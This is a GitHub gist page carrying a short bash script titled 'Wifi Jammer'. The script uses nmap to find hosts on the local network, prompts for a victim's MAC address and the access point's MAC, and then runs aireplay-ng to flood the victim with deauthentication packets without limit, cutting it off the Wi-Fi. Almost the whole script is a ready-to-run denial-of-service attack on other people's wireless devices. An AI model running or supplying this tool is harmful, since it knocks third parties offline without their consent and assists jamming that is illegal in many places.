Skip to content

Instantly share code, notes, and snippets.

@gibbyb
Last active September 25, 2022 20:14
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save gibbyb/18ab697c003d16daec109950c2803355 to your computer and use it in GitHub Desktop.
Save gibbyb/18ab697c003d16daec109950c2803355 to your computer and use it in GitHub Desktop.
Wifi Jammer using aircrack-ng and nmap
#!/bin/bash
#A very simple yet effective Wifi Jammer
#There are other jammers out there, but they did not work for me
#Let me know how it works for ya and feel free to give me any tips.
#This is the first script I have written.
clear
echo -n "Wifi Jammer ";echo "By Gibby"
echo "You will need aircrack-ng and nmap for this tool."
echo -n "If it's all good, press enter.";read
DefaultGateway=`route -n|grep ^0.0.0.0|cut -d' ' -f 10 | uniq`
echo "Okay. Now we're going to scan your network for MACs to kill."
nmap -sP $DefaultGateway/24
echo "Now, what is the MAC of the host you wish to disconnect? ";read hostmac
ifconfig wlan0 up
ifconfig wlan0 down
aireplay-ng -9 wlan0
echo "What is the MAC address of the network? ";read netmac
# echo -n "What is the channel of the network? ";read netchan
# airodump-ng -c $netchan -b $netmac -w psk wlan0
# echo "$hostmac should be listed in the table. Press Enter to Continue";read
#I took this part out as I dont know how to run the rest of the script in a new terminal.
echo "Note that once it has begun, go to a new terminal and write ifconfig wlan0 up"
echo "This will bring your internet connection back."
echo -n "Press Enter to Jam the host. ";read
aireplay-ng -0 0 -a $netmac -c $hostmac wlan0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment